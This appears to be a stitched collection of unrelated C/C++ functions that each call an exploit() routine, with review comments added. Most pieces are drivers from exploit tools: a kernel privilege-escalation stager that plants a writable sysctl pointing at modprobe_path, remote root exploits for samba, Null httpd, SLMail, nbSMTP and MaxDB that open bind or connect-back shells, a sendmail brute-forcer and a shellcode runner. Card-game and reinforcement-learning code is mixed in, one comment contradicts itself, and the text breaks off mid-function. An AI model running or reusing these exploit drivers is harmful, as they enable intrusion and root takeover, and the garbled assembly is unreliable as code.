/*
 * Two-stage driver: each stage hands a kernel function address from the
 * global `off` table (declared elsewhere) to exploit(), which is defined
 * elsewhere together with verify_stage1/verify_stage2.
 *
 * Stage 1 passes off->set_memory_rw with VSYSCALL as its argument; per the
 * progress messages the intent is to make the vsyscall page writable.
 * Stage 2 writes a `struct ctl_table` into that page at VSYSCALL+0x850 and
 * passes off->register_sysctl_table the same address.
 *
 * NOTE(review): nothing here checks that stage 1 succeeded before writing
 * through the VSYSCALL pointers; the 0x850/0xd00/0xe00/0xf00 offsets and the
 * 1952-byte memset are a hard-coded layout. Observable artefacts of stage 2:
 * a sysctl entry named "hack" with mode 0666 whose handler is
 * off->proc_dostring and whose data pointer is off->modprobe_path.
 */
void wrapper(void)
{
    struct ctl_table *c;

    fprintf(stderr,"exploit starting\n");
    printf("making vsyscall page writable..\n\n");

    exploit(off->set_memory_rw, VSYSCALL, verify_stage1);

    printf("\nstage 1 completed\n");

    sleep(5);

    printf("registering new sysctl..\n\n");

    /* The ctl_table lives inside the vsyscall page itself. */
    c = (struct ctl_table *)(VSYSCALL+0x850);

    /* Clear the region the table and its string/flag buffers occupy. */
    memset((char *)(VSYSCALL+0x850), '\x00', 1952);

    /* procname buffer at +0xf00, a 4-byte little-endian 1 at +0xe00
     * (used as extra1), extra2 points at +0xd00 which stays zeroed. */
    strcpy((char *)(VSYSCALL+0xf00),"hack");
    memcpy((char *)(VSYSCALL+0xe00),"\x01\x00\x00\x00",4);
    c->procname = (char *)(VSYSCALL+0xf00);
    c->mode = 0666;
    c->proc_handler = (void *)(off->proc_dostring);
    c->data = (void *)(off->modprobe_path);
    c->maxlen=256;
    c->extra1 = (void *)(VSYSCALL+0xe00);
    c->extra2 = (void *)(VSYSCALL+0xd00);

    exploit(off->register_sysctl_table, VSYSCALL+0x850, verify_stage2);

    printf("stage 2 completed\n");
}
/*
 * Entry point: resolves argv[1], connects a TCP socket to it on PORT (a
 * constant defined elsewhere) and hands the socket to exploit() (defined
 * elsewhere). With 4 arguments the connect-back address/port from argv[2..3]
 * are XOR-masked with 0x99999999 / 0x9999 before being passed; with 2
 * arguments the last parameter is 1 and the address/port are zero.
 *
 * NOTE(review): socket() is not checked for -1 before connect(); atoi() on
 * argv[3] is unvalidated (use strtol); `( unsigned short ) NULL` is a
 * pointer-to-integer cast that only works by accident; main falls off the
 * end without a return (C99 makes that return 0).
 */
int
main ( int argc, char* argv[] )
{
	int s;
	unsigned long cbip;
	unsigned short cbport;
	struct sockaddr_in remote_addr;
	struct hostent* host_addr;

	/* Accept exactly 2 or 4 arguments; anything else is a usage error. */
	if ( argc != 2 )
		if ( argc != 4 )
			{ fprintf ( stderr, "Usage\n-----\n[bindshell] %s <ip>\n[reverseshell] %s <ip> <cbip> <cbport>\n", argv[0], argv[0] ); exit ( 1 ); }

	if ( ( host_addr = gethostbyname ( argv[1] ) ) == NULL )
		{ fprintf ( stderr, "Cannot resolve hostname: %s\n", argv[1] ); exit ( 1 ); }

	remote_addr.sin_family = AF_INET;
	remote_addr.sin_addr   = * ( ( struct in_addr * ) host_addr->h_addr );
	remote_addr.sin_port   = htons ( PORT );

	s = socket ( AF_INET, SOCK_STREAM, 0 );
	printf ( "connecting to %s:%u...", argv[1], PORT );
	if ( connect ( s, ( struct sockaddr * ) &remote_addr, sizeof ( struct sockaddr ) ) ==  -1 )
		{ printf ( "failed!\n" ); exit ( 1 ); }
	printf ( "ok!\n" );

	if ( argc == 4 )
	{
		/* Mask the connect-back address/port; exploit() is expected to undo it. */
		cbip = inet_addr ( argv[2] ) ^ ( unsigned long ) 0x99999999;
		cbport = htons ( atoi ( argv[3] ) ) ^ ( unsigned short ) 0x9999;
		exploit ( s, cbip, cbport, 0 );
	}
	else
		exploit ( s, ( unsigned long ) NULL, ( unsigned short ) NULL, 1 );
}
/*
 * Two-stage driver (variant of the same routine using the SET_MEMORY_RW,
 * PROC_DOSTRING, MODPROBE_PATH, REGISTER_SYSCTL_TABLE and SYSCTL_NAME
 * constants instead of an `off` table). exploit(), verify_stage1/2 and
 * dprintf are defined elsewhere.
 *
 * Stage 1 passes SET_MEMORY_RW with VSYSCALL; stage 2 builds a
 * `struct ctl_table` at VSYSCALL+0x850 and passes REGISTER_SYSCTL_TABLE
 * that address.
 *
 * NOTE(review): as in the sibling wrapper(), stage 1's outcome is never
 * checked before the VSYSCALL writes, and the layout offsets are
 * hard-coded. Resulting artefact: a sysctl named SYSCTL_NAME, mode 0666,
 * handler PROC_DOSTRING, data pointer MODPROBE_PATH.
 */
void wrapper(void)
{
    struct ctl_table *c;

    dprintf("[.] making vsyscall page writable...\n\n");

    exploit(SET_MEMORY_RW, VSYSCALL, verify_stage1);

    dprintf("[~] done, stage 1 completed\n");

    sleep(5);

    dprintf("[.] registering new sysctl...\n\n");

    /* The ctl_table lives inside the vsyscall page itself. */
    c = (struct ctl_table *)(VSYSCALL+0x850);

    /* Clear the region the table and its buffers occupy. */
    memset((char *)(VSYSCALL+0x850), '\x00', 1952);

    /* procname at +0xf00, a 4-byte little-endian 1 at +0xe00 (extra1),
     * extra2 at +0xd00 which stays zeroed. */
    strcpy((char *)(VSYSCALL+0xf00), SYSCTL_NAME);
    memcpy((char *)(VSYSCALL+0xe00), "\x01\x00\x00\x00",4);
    c->procname = (char *)(VSYSCALL+0xf00);
    c->mode = 0666;
    c->proc_handler = (void *)(PROC_DOSTRING);
    c->data = (void *)(MODPROBE_PATH);
    c->maxlen = 256;
    c->extra1 = (void *)(VSYSCALL+0xe00);
    c->extra2 = (void *)(VSYSCALL+0xd00);

    exploit(REGISTER_SYSCTL_TABLE, VSYSCALL+0x850, verify_stage2);

    dprintf("[~] done, stage 2 completed\n");
}
/*
 * Intended as a command dispatcher: -x/-X runs exploit(), -b/-B runs
 * device_autoboot(), -f/-F uploads argv[1]; all helpers are defined elsewhere.
 *
 * NOTE(review): this does not work as written.
 *  - `int main(char* argv[], int argc)` swaps the parameter order/types of
 *    the standard `main(int argc, char *argv[])`; the runtime still passes
 *    (argc, argv), so `argv` receives the count and `argc` the pointer.
 *  - `argv[0] == "-x" || "-X"` compares pointers, not strings, and the
 *    `|| "-X"` operand is a non-null literal, so the whole condition is
 *    always true and the first branch is always taken (the later
 *    branches are unreachable). strcmp() on argv[1] is what was meant.
 *  - Returning 1 from main on success and -1 on "not found" inverts the
 *    usual exit-status convention.
 */
int main(char* argv[], int argc){

	stuff();

	if (argv[0] == "-x" || "-X") {
		exploit();
		return 1;
	}

	else if (argv[0] == "-b" || "-B") {
		device_autoboot();
		return 1;
	}

    else if (argv[0] == "-f" || "-F") {
        device_upload(argv[1]);
        return 1;
    }

    else {
    	printf("Command not found\n");
    	return -1;
    }


}
// Slot for pushButton_3: loads the nmap XML report from <appdir>/nmap/scan.xml,
// pulls port/service attributes into the table via xmlRead(), runs exploit()
// and resizes the table rows. Open/parse failures are reported in a dialog but
// do not abort: the remaining steps run against an empty document.
void MainWindow::on_pushButton_3_clicked()
{
    const QString reportPath = QApplication::applicationDirPath() + "/nmap/scan.xml";
    QFile report(reportPath);
    QDomDocument dom;

    if (report.open(QIODevice::ReadOnly | QIODevice::Text)) {
        const bool parsed = dom.setContent(&report);
        if (!parsed) {
            QMessageBox::critical(this,"Parsing Error","Error while parsing the XML file information!");
        }
        report.close();
    } else {
        QMessageBox::critical(this,"Unable to read file","There was an error opening the XML file!");
    }

    QDomElement root = dom.firstChildElement();

    // Column index is the last argument: port id, service name, product, version.
    xmlRead(root,"port","portid",0);
    xmlRead(root,"service","name",1);
    xmlRead(root,"service","product",2);
    xmlRead(root,"service","version",3);

    exploit();

    ui->tableWidget->resizeRowsToContents();
}
// Epsilon-greedy style action selection: explore when a uniform draw falls
// below exploration_rate_ or the window is not yet full, otherwise exploit
// the window. The random draw always happens first; window.full() is only
// consulted when the draw did not already force exploration.
pair<vector<float>,float> CDACN::policy(const Window &window)
{
	const bool mustExplore = (uniform_real(engine) < exploration_rate_) || !window.full();
	return mustExplore ? explore() : exploit(window);
}
/* 
 * OK here is how we brute force.
 * We need to find two values... a valid chunk to free (our fake chunk)
 * and the pvpbuf addr
 * Since our fake chunk is repeated all over and is 4*5 bytes long,
 * we have 5 possibilities of error in a sequential search. We try for:
 * chunk,chunk+4,chunk+8,chunk+12,chunk+16
 *
 * pvpbuf addr must be somewhere lower than ebp, specifically ebp + target.bufp (or else
 * the exploit will fail since we cannot overwrite bufp). We start from bruteforcing ebp + target.bufp
 * decreasing by 4 bytes
 *
 */
/*
 * Search driver over two unknowns of `target` (passed by value, so the
 * caller's copy is untouched): for each candidate pvpbuf it tries five
 * chunk values (chunk, chunk+4 ... chunk+16), then resets chunk and moves
 * pvpbuf down by 4. exploit() (defined elsewhere) returns non-zero on
 * success. Gives up once ebp - pvpbuf reaches 2000.
 *
 * NOTE(review): the %x conversions assume the target_info fields are
 * unsigned int; the struct definition is not visible here.
 */
void bruteforce(struct target_info target) {
	int cincrease = 0;	/* how many times we increased chunk value */
	target.pvpbuf = target.ebp+target.bufp;

	printf("Trying pvpbuf=0x%x\n",target.pvpbuf);

	while(target.ebp - target.pvpbuf < 2000) {	/* exploit will fail since pvpbuf < 2000 bytes */
		if(exploit(target)) {
			printf("Successfull exploitation with pvpbuf=0x%x and chunk=0x%x\n",target.pvpbuf,target.chunk);
			return;
		}
		
		/* make sure it is a "usable" address ... start with a base of 0x0a since u have space untill 0xfe */		
		target.chunk+=4;
		cincrease++;
		/* After 5 chunk candidates, rewind chunk and step pvpbuf down. */
		if(cincrease > 4) {
			target.chunk -= cincrease*4;	/* start at initial value again */
			cincrease =0;
			target.pvpbuf -= 4;
			printf("Trying pvpbuf=0x%x\n",target.pvpbuf);
		}
	}
	
	printf("Bruteforce failed\n");
}
/*
 * Entry point: parses -t <target> / -p <port> / -h into the globals `target`
 * and `port` (declared elsewhere), then walks `ret` from START down to STOP
 * in OFFSET steps, calling hate(ret) and exploit() for each value. usage(),
 * hate(), exploit() and the START/STOP/OFFSET constants are defined elsewhere.
 *
 * NOTE(review): `case 'h'` has no break and falls through into default,
 * which is harmless only because both call usage() (presumably it exits).
 * `ret` is unsigned long but printed with %x; use %lx. If STOP is 0 the
 * `ret>=STOP` condition is always true and the loop never terminates.
 * atoi() on optarg is unvalidated.
 */
int
main (int argc, char * argv[])
{
   int c;
   unsigned long ret;

   while((c=getopt (argc, argv, "ht:p:")) != EOF)
   {
      switch(c)
      {
         case 't': target = optarg; break;
         case 'p': port = atoi (optarg); break;
         case 'h': usage (argv[0]);
         default : usage (argv[0]);
      }
   }

   if (argc==1 || target == NULL)
      usage (argv[0]);

   fprintf (stdout, "\n [~] 0x333hate => samba 2.2.x remote root exploit [~]\n");
   fprintf (stdout, " [~]        coded by c0wboy ~ www.0x333.org       [~]\n\n");

   fprintf (stdout, " [-] connecting to %s:%d\n", target, port);
   fprintf (stdout, " [-] stating bruteforce\n\n");

   /* Descending sweep; exploit() is expected not to return on success. */
   for (ret=START; ret>=STOP; ret-=OFFSET)
   {
      fprintf (stdout, " [-] testing 0x%x\n", ret);
      hate (ret);
      exploit ();
   }
   fprintf (stdout, " [-] uhm ... maybe samba is not vulnerable !\n");
   return 0;
}
// Deals predefined hands: tefudaSet[i] is a text hand for player i written as
// space-separated two-character cards (suit letter from "SHDCJ" followed by a
// rank character from "3456789XJQKA2R"). Cards are assigned seat by seat
// starting from the Daifugo when ranks differ, otherwise from the first seat.
// Afterwards exploit(result) runs the card-exchange ("taxation") step of the
// game when it applies.
//
// NOTE(review): `j<tefudaSet[i].length()-1` is an int/size_t comparison; an
// empty string makes length()-1 wrap to SIZE_MAX. The loop also assumes
// tefudaSet has at least config.PLAYER_NUM entries. A card that fails to
// parse terminates the whole process with exit(1).
void Game::dealCards( Result *result, vector<string> &tefudaSet){
    COUT<<"dc"<<endl;
    // deal the cards
    // using tefudaSet
    
    // start from the Daifugo if there is a rank difference, otherwise from the lowest seat number
    int target = players.convIDtoSekiNum( ( players.isInequality() ) ? players.mibunId(DAIFUGO) : players.sekijun[0]);// from the Daifugo
    string suit = "SHDCJ";
    string rank = "3456789XJQKA2R";
    
    // reset every player's cards first
    for(int i=0; i<players.size(); i++){
        players.id[i].initCard();
    }
    
    for(int i=0; i<config.PLAYER_NUM; i++){
        // assign the hand set to each player in turn
        for(int j=0; j<tefudaSet[i].length()-1; j++){
            if( tefudaSet[i][j] == ' ' ){
                continue;
            }
            int s=-1, r=-1;
            // suit index from the first character
            for(int k=0; k<5; k++){
                if( suit[k] == tefudaSet[i][j]){
                    s = k;
                    break;
                }
            }
            j++;// advance to the rank character
            for(int k=0; k<14; k++){
                if( rank[k] == tefudaSet[i][j]){
                    r = k;
                    break;
                }
            }
            if( s < 0 || r < 0 ){
                exit(1);
            }
            // suit index 4 is the joker slot; other suits store rank at r+1
            if( s == 4){
                players.id[players.sekijun[target]].cards[ 4 ][ 1 ] = 1;// put it in
            }else{
                players.id[players.sekijun[target]].cards[ s ][ r+1 ] = 1;// put it in
            }
            players.id[players.sekijun[target]].cards_num++;// bump the card count
            
        }
        
        // next player
        target = ( target + 1 ) % ( players.size() );
    }
    
    // run the exchange step if it applies
    exploit( result );
}
/*
 * Entry point: validates argv[1] with isip(), lets the user pick one of two
 * entries from the global `target[]` table, connects to argv[1]:PORT, calls
 * exploit(s, ret) and on success connects to port 4444. header(), isip(),
 * exploit(), connect_to_bindshell(), `target` and PORT are defined elsewhere.
 *
 * NOTE(review): scanf("%d", &targ) is unchecked, so non-numeric input leaves
 * `targ` uninitialized before the range test. system("clear") is cosmetic
 * but spawns a shell. main has no return statement.
 */
int
main ( int argc, char* argv[] )
{
	int s, targ, i;
	struct sockaddr_in remote_addr;
	struct hostent* host_addr;

	if ( argc != 2 )
	{
		printf ( "Usage: %s <ip>\n", argv[0] );
		exit ( 1 );
	}
	system ( "clear" );
	header ();
	if ( !isip ( argv[1] ) )
	{
		printf ( "Invalid Target IP!\n" );
		exit ( 1 );
	}
	printf("--[ select target\n");
	for ( i = 0; i < 2; i++ )
		printf ( "--[ %d [0x%08x] %s\n", target[i].num, target[i].ret, target[i].name );
	printf ( " >> " );
	scanf ( "%d", &targ );
	/* Only indices 0 and 1 exist in the table shown above. */
	if ( targ != 0 )
		if ( targ != 1 )
		{
			printf ( "--[ invalid target!\n" );
			exit ( 1 );
		}
	if ( ( host_addr = gethostbyname ( argv[1] ) ) == NULL )
	{
		fprintf ( stderr, "cannot resolve \"%s\"\n", argv[1] );
		exit ( 1 );
	}
	remote_addr.sin_family = AF_INET;
	remote_addr.sin_addr   = * ( ( struct in_addr * ) host_addr->h_addr );
	remote_addr.sin_port   = htons ( PORT );

	if ( ( s = socket ( AF_INET, SOCK_STREAM, 0 ) ) < 0 )
    {
		printf ( "socket failed!\n" );
		exit ( 1 );
	}
	printf ( "--[ connecting to %s:%u...", argv[1], PORT  );
	if ( connect ( s, ( struct sockaddr * ) &remote_addr, sizeof ( struct sockaddr ) ) ==  -1 )
	{
		printf ( "failed!\n" );
		exit ( 1 );
	}
	printf ( "done!\n" );
	/* exploit() signals failure with 1. */
	if ( exploit ( s, target[targ].ret ) == 1 )
	{
		printf ( "exploitation FAILED!\n" );
		exit ( 1 );
	}
	close ( s );
	connect_to_bindshell ( argv[1], 4444 );
}
/*
 * Entry point: parses -h <host>, -p <port> and -t <target index>, prints the
 * target list on -t0 or an out-of-range index, then calls
 * exploit(host, port, type). usage(), exploit() and `targets` are defined
 * elsewhere; usage() is assumed not to return.
 *
 * NOTE(review): the element count is computed as sizeof(targets)/12, i.e.
 * the struct size is hard-coded; use sizeof(targets)/sizeof(targets[0]).
 * A negative -t value passes the `type > count` test (signed int promoted
 * to size_t only in the comparison? no: `type > sizeof(...)/12` converts
 * type to unsigned, so negatives are rejected) — fine, but atoi() itself
 * is unvalidated. host is zeroed and strncpy'd with sizeof-1, so it stays
 * NUL-terminated.
 */
int
main (int argc,char *argv[])
{
        char host[256];
        int i,opt,type=0,port=80;

        fprintf(stdout,"Null httpd 0.5.0 remote root exploit            by eSDee of Netric\n");
        fprintf(stdout,"--------------------------------------------------(www.netric.org)\n");

        memset(host, 0x0, sizeof(host));

        while((opt=getopt(argc,argv,"h:p:t:")) !=EOF)
        {
                switch(opt)
                {
                        case 'h':
                                strncpy(host, optarg, sizeof(host) - 1);
                                break;
                        case 'p':
                                port=atoi(optarg);
                                if ((port <= 0) || (port > 65535)) {
                                        fprintf(stderr,"Invalid port.\n\n");
                                        return -1;
                                }
                                break;
                        case 't':
                                type=atoi(optarg);
                                /* -t0 (or an out-of-range index) lists the targets and exits. */
                                if (type == 0 || type > sizeof(targets)/12) {
                                        for(i = 0; i < sizeof(targets)/12; i++)
                                                fprintf(stderr, "%d. %s\t (0x%08x - 0x%08x)\n",
                                                                i + 1,
                                                                targets[i].type,
                                                                targets[i].ret,targets[i].retloc);
                                        fprintf(stderr, "\n");
                                        return -1;
                                }
                                break;
                        default:
                                usage(argv[0]);
                                break;
                }

        }

        if (strlen(host) == 0) usage(argv[0]);

        if (!type) {
                fprintf(stderr, "No target given, use -t0 for a list.\n\n");
                return -1;
        }

        if (exploit(host, port, type) < 0) {
                fprintf(stderr, "Failed.\n\n");
                return -1;
        }

        return 0;
}
/*
 * Entry point: collects a return address (-r), shellcode address (-s),
 * target index (-t, 1-based into the global `targets`), optional offset
 * added to shaddr (-o) or a target listing (-l), then calls
 * exploit(retaddr, shaddr). use(), printlist(), exploit() and `targets`
 * are defined elsewhere; use() is assumed not to return.
 *
 * NOTE(review):
 *  - `char opt` compared against EOF: on platforms where char is unsigned
 *    the loop never terminates; getopt() returns int.
 *  - `targetnum = atoi(optarg)-1` is indexed without a lower bound check,
 *    so "-t 0" or a negative value reads before the array.
 *  - %010p is given an int, not a pointer (undefined format/argument
 *    mismatch); %#010x would match.
 *  - the local `system` shadows the libc system() function.
 *  - main has no return statement.
 */
int main(int argc, char *argv[])
{
	char opt, *system=NULL;
	int shaddr=0, retaddr=0, targetnum=0, offset=0, i;

	printf("\n nbSMTP v0.99 remote format string exploit\n");
	printf(" by CoKi <*****@*****.**>\n\n");

	while((opt = getopt(argc,argv,"r:s:t:lo:")) != EOF) {
		switch (opt) {
			case 'r':
				retaddr = strtoul(optarg,NULL,0);
				system = "unknown";
				break;
			case 's':
				shaddr = strtoul(optarg,NULL,0);
				break;
			case 't':
				targetnum = atoi(optarg)-1;
				/* A zero `num` field marks an unused table slot. */
				if(targets[targetnum].num) {				
					system = targets[targetnum].os;
					retaddr = targets[targetnum].retaddr;
					shaddr = targets[targetnum].shaddr;
				}
				else use(argv[0]);
				break;
			case 'l':
				printlist();
				break;
			case 'o':
					/* Order-dependent: -o must come after -s/-t to take effect. */
					offset = atoi(optarg);
			        shaddr += offset;
			        break;
			default:
				use(argv[0]);
				break;
		}
	}

	if(retaddr == 0) use(argv[0]);
	if(shaddr == 0) use(argv[0]);
	if(system == NULL) {
		system = "unknown";
	}

	printf(" [*] system\t\t\t: %s\n", system);
	printf(" [*] return address\t\t: %010p\n", retaddr);

	printf(" [*] shellcode address\t\t: %010p", shaddr);
	fflush(stdout);

	if(offset) printf(" (offset %d)\n", offset);
	else printf("\n");

	exploit(retaddr, shaddr);
}
/*
 * Entry point: parses arguments into `myargs` (type `args`, defined
 * elsewhere), connects to myargs.tip:myargs.tport, asks the user to choose
 * option 0 (bind: afterwards connects to port 20000) or 1 (connect-back:
 * afterwards listens on 45295), and calls exploit() with the addresses from
 * the global `target` table. All helpers are defined elsewhere.
 *
 * NOTE(review): scanf("%d", &option) is unchecked, so bad input leaves
 * `option` uninitialized (it then falls to the default branch only by
 * luck). connect_to_remote_host()'s result is not checked for an error
 * value before use. system("clear") spawns a shell purely for cosmetics.
 */
int
main ( int argc, char* argv[] )
{
        int s, option;
        args myargs;

        system ( "clear" );
        header ();
        parse_arguments ( argc, argv, &myargs );
        s = connect_to_remote_host ( myargs.tip, myargs.tport );

        printf ( "--[ select shellcode\n" );
        printf ( "     |\n" );
        printf ( "     |- [0] bind\n" );
        printf ( "     `- [1] cb\n" );
        printf ( ">> " );
        scanf ( "%d", &option );
        switch ( option )
                {
                        case 0:
                                printf ( "--[ using bind shellcode\n" );
                                /* exploit() returns 1 on failure; NULL means no connect-back address. */
                                if ( exploit ( s, target[myargs.target].smashaddr, target[myargs.target].writeaddr, NULL ) == 1 )
                                {
                                        printf ( "exploitation failed!\n" );
                                        exit ( 1 );
                                }
                                connect_to_bindshell ( myargs.tip, 20000 );
                                break;
                        case 1:
                                printf ( "--[ using cb shellcode\n" );
                                if ( exploit ( s, target[myargs.target].smashaddr, target[myargs.target].writeaddr, myargs.lip ) == 1 )
                                {
                                        printf ( "exploitation failed!\n" );
                                        exit ( 1 );
                                }
                                start_reverse_handler ( 45295 );
                                break;
                        default:
                                printf ( "--[ invalid shellcode!\n" ); exit ( 1 );
            }
        close ( s );
        return 0;
}
/*
 * Shellcode test harness: makes the page containing the global `shellcode`
 * buffer (declared elsewhere) readable/writable/executable and jumps to it.
 * strlen(shellcode) is only used for the diagnostic message, so the
 * computed size stops at the first NUL byte.
 *
 * NOTE(review): `(unsigned)shellcode & 0xfffff000` truncates the pointer to
 * 32 bits and assumes 4 KiB pages; on 64-bit builds the address is wrong.
 * Use (uintptr_t) and sysconf(_SC_PAGESIZE). A buffer spanning a page
 * boundary is only partially covered by the 0x1000-byte mprotect.
 */
int main() {

    int size = strlen(shellcode);
    void (*exploit)(void) = (void(*)(void))shellcode;
     if(-1== mprotect((void*)((unsigned)shellcode&0xfffff000),0x1000,PROT_READ|PROT_WRITE|PROT_EXEC)){    
			perror("mprotect");    printf("shellcode size = %d\n",size);
			exit(-1);    
	 }
	exploit();
    return 0;
}
/*
 * Entry point (Winsock build, see closesocket()): connects to argv[1] on
 * POP3 port 110 via connect_target() and passes the socket to exploit();
 * both are defined elsewhere.
 *
 * NOTE(review): the return value of connect_target() is not checked before
 * use, and `data` is declared but never used. Usage errors exit with 0.
 */
int main(int argc, char **argv)
{
    int sock = 0;
    int data, port;
    printf("\n[$] SLMail Server POP3 PASSWD Buffer Overflow exploit\n");
    printf("[$] by Mad Ivan [ void31337 team ] - http://exploit.void31337.ru\n\n");
    if ( argc < 2 ) { printf("usage: slmail-ex.exe <host> \n\n"); exit(0); }
    port = 110;
    sock = connect_target(argv[1], port);
    exploit(sock);
    closesocket(sock);
    return 0;
}
// Builds a shuffled deck, hands it out one card at a time starting from the
// Daifugo (or the first seat when ranks are equal), records every player's
// starting hand in `result`, then runs the card-exchange step exploit(result).
// Card encoding: suit*14 + rank for the four ordinary suits (rank 1..13);
// jokers are 14*4 + 1, one per config.JOKER_NUM.
void Game::dealCards( Result *result){
    COUT<<"dc"<<endl;

    vector<int> deck;
    for(int suit=0; suit<4; suit++){
        for(int rank=1; rank<=13; rank++){
            deck.push_back( suit*14 + rank );
        }
    }
    for(int joker=0; joker<config.JOKER_NUM; joker++){
        deck.push_back( 14*4 + 1 );
    }

    // Shuffle by 2*deck.size() random transpositions. The two draws from
    // the game's random source happen in the same order as before, so the
    // resulting permutation is unchanged for a given seed.
    const int swaps = deck.size()*2;
    const int maxIndex = deck.size()-1;
    for(int n=0; n<swaps; n++){
        int first = (int)( maxIndex * random->rand() );
        int second = (int)( maxIndex * random->rand() );
        int held = deck[first];
        deck[first] = deck[second];
        deck[second] = held;
    }

    // Reset every hand, then deal clockwise from the starting seat.
    for(int p=0; p<players.size(); p++){
        players.id[p].initCard();
    }
    int seat = players.convIDtoSekiNum( players.isInequality() ? players.mibunId(DAIFUGO) : players.sekijun[0]);

    while( !deck.empty() ){
        int card = deck[0];
        int owner = players.sekijun[seat];
        players.id[owner].cards[card/14][card%14] = 1;
        players.id[owner].cards_num++;
        deck.erase( deck.begin() );
        seat = ( seat + 1 ) % ( players.size() );
    }

    // Snapshot of the initial hands for the result record.
    int firstHands[5][8][15]={{0}};
    for(int p=0;p<players.size();p++){
        copyCard( firstHands[p], players.id[p].cards );
    }
    result->setFirstCards( firstHands );

    exploit( result );
}
/*
 * Entry point: fills the global `host` (struct sockaddr_in, declared
 * elsewhere) from argv[1] and an optional argv[2] port (default 9999),
 * connects with connect_port(), passes the socket to exploit(), then after
 * one second tries to connect to port 13370 and hands that socket to
 * shell(). banner(), usage(), connect_port(), exploit(), shell() are
 * defined elsewhere; connect_port() is treated as returning 0 on failure.
 *
 * NOTE(review): atoi(argv[2]) is unvalidated; a port above 65535 is
 * silently truncated by the u_short cast. errx(-1, ...) exits with status
 * 255, not -1.
 */
int main(int argc, char **argv)
{
  int sock_maxdb, sock_shell;
  struct hostent *hn;

  banner();
  if (argc < 2) usage(argv[0]);

  memset(&host, 0, sizeof(host));
  host.sin_family = AF_INET;
  host.sin_port = (argc > 2) ? htons((u_short)atoi(argv[2])) : htons(9999);

  if ( (hn = gethostbyname(argv[1])) == NULL)
    errx(-1, "Unresolvable address\n");

  memcpy(&host.sin_addr, hn->h_addr, hn->h_length);
  printf("[*] Connecting to %s:%d... ",
	 inet_ntoa(host.sin_addr), ntohs(host.sin_port));
  fflush(stdout);

  sock_maxdb = connect_port(ntohs(host.sin_port));

  if (!sock_maxdb) 
    {
      printf("failure.\n\n");
      exit(-1);
    }
  printf("success.\n");

  printf("[*] Sending evil payload...\n");
  exploit(sock_maxdb);
  close(sock_maxdb);
  fflush(stdout);

  /* Give the remote side a moment before probing the second port. */
  sleep(1);

  printf("[*] Trying to connect to spawned shell... ");
  sock_shell = connect_port(13370);

  if (!sock_shell)
    {
      printf("failure.\n\n");
      exit(-1);
    }

  printf("success!\n\nEnjoy :)\n\n");
  shell(sock_shell);

  return 0;
}
/*
 * Entry point: -t <n> runs exploit() with entry n-1 of the global `target`
 * table, -b runs bruteforce() with that entry's path, -o <offset> adds the
 * offset to esp() and runs exploit() with the result. usage(), exploit(),
 * bruteforce(), esp() and `target` are defined elsewhere.
 *
 * NOTE(review): this does not compile cleanly or behave as intended.
 *  - `sel` is only set by -t/-o, so "-b" given first (or alone) indexes
 *    target[] with an uninitialized value; "-t 0" reads target[-1].
 *  - `offset` is a char* but is assigned the int from atoi(); it was meant
 *    to be a long (or int), and `esp()+offset` then becomes pointer
 *    arithmetic instead of an address shift.
 *  - usage((char **)argv[0]) casts a char* to char**; the default branch
 *    passes &argv[0], which is what was meant.
 */
int main(int argc, char **argv)
{
int cnt, sel;
char *offset;
long returnaddr;

if(argc == 1)
{
  usage((char **)argv[0]);
  exit(1);
}

while((cnt = getopt(argc,argv,"t:b:o:")) != EOF)
  {
     switch(cnt)
     {
      case 't': //target distro
         sel = atoi(optarg);
         exploit(target[sel-1].ret,(char **)target[sel-1].path);
         break;
      case 'b': //brute force
         bruteforce((char **)target[sel-1].path);
         break;
      case 'o': //offset
         offset = atoi(optarg);
         returnaddr=esp()+offset;
         sel = atoi(optarg);
         exploit(returnaddr,(char **)target[sel-1].path);
         break;
      default:
         usage(&argv[0]);
         break;
     }
  }
  return(0);
}
/*
 * Entry point: -t <index> picks an entry of the global `targets` table and
 * disables brute forcing; -b (the default) runs bruteforce() on the chosen
 * entry; otherwise exploit() is called once and its non-zero return is
 * reported as success. usage(), bruteforce(), exploit() and `targets`
 * are defined elsewhere.
 *
 * NOTE(review): the `t >= sizeof(targets)/sizeof(struct target_info)`
 * test converts t to size_t, so negative -t values are rejected too
 * (by accident rather than design). `case 'h'`/default call usage() with
 * no break and rely on it not returning. The %x conversions assume the
 * target_info fields are unsigned int.
 */
int main(int argc, char *argv[]) {
	int t = 0;
	int brute = 1;
	int opt;

	printf("Local sendmail 8.11.6 exploit by sorbo ([email protected])\n");

	while( (opt = getopt(argc,argv,"t:bh")) != -1) {
		switch(opt) {
			case 't':
				t = atoi(optarg);
				if(t >= sizeof(targets)/sizeof(struct target_info)) {
					printf("Invalid target %d\n",t);
					exit(0);
				}
				brute = 0;
				break;
				
			case 'b':
				brute = 1;
				break;
				

			case 'h':
			default:
				usage(argv[0]);
		}
	}
	
	printf("Attempting to exploit %s\n",targets[t].description);
	if(brute) {
		bruteforce(targets[t]);
		exit(0);
	}

	printf("pvpbuf=\t\t0x%x\n",targets[t].pvpbuf);
	printf("zero=\t\t0x%x\n",targets[t].zero);
	printf("chunk=\t\t0x%x\n",targets[t].chunk);
	printf("shellcode=\t0x%x\n",targets[t].ret);

	/* `t` is reused to hold exploit()'s success flag from here on. */
	t = exploit(targets[t]);
	if(t)
		printf("Exploit successfull\n");
	else
		printf("Exploit failed... try adding -b\n");

	exit(0);
}
/*
 * Return-address search: forks a child per attempt that calls
 * exploit(ret, path) and exits; the parent waits for it and keeps going
 * while getuid() is still non-zero. `ret` starts at esp()+5 and climbs in
 * steps of 5 until x reaches 3000, then restarts from esp() and descends
 * in steps of 5 until x reaches -3000. esp() and exploit() are defined
 * elsewhere. Refuses to run as uid 0.
 *
 * NOTE(review):
 *  - `else perror("fork failed")` runs in the parent on every successful
 *    fork (pid > 0), not only when fork() returns -1, so "fork failed" is
 *    printed on each iteration; the check should be `pid == -1`.
 *  - `x>=3000` followed by `x<=3000&&x>=0` means the boundary value is
 *    handled by the first branch only; the descending branch then runs
 *    from x=-1 down to -3000 with `ret-=offset`.
 *  - `x` is printed with "%d" as a progress counter; `ret` itself is
 *    never shown.
 *  - system("id") at the end spawns a shell to show the resulting uid.
 */
void bruteforce(char **path)
{
pid_t pid;
int x=0, offset=5;
long ret;

  printf("attemping brute force\n\n");

  if(!getuid())
  {
   printf("brute force cannot be run while uid is 0\n");
   exit(0);
  }
   ret=esp()+offset;
   while(getuid()&&(x<=3000&&x>=-3000))
   {
       if((pid=fork())==0)
       {
          exploit(ret,path);
          exit(0);
       }
       else perror("fork failed");

       if(waitpid(pid,NULL, 0)!= pid) perror("waitpid error");
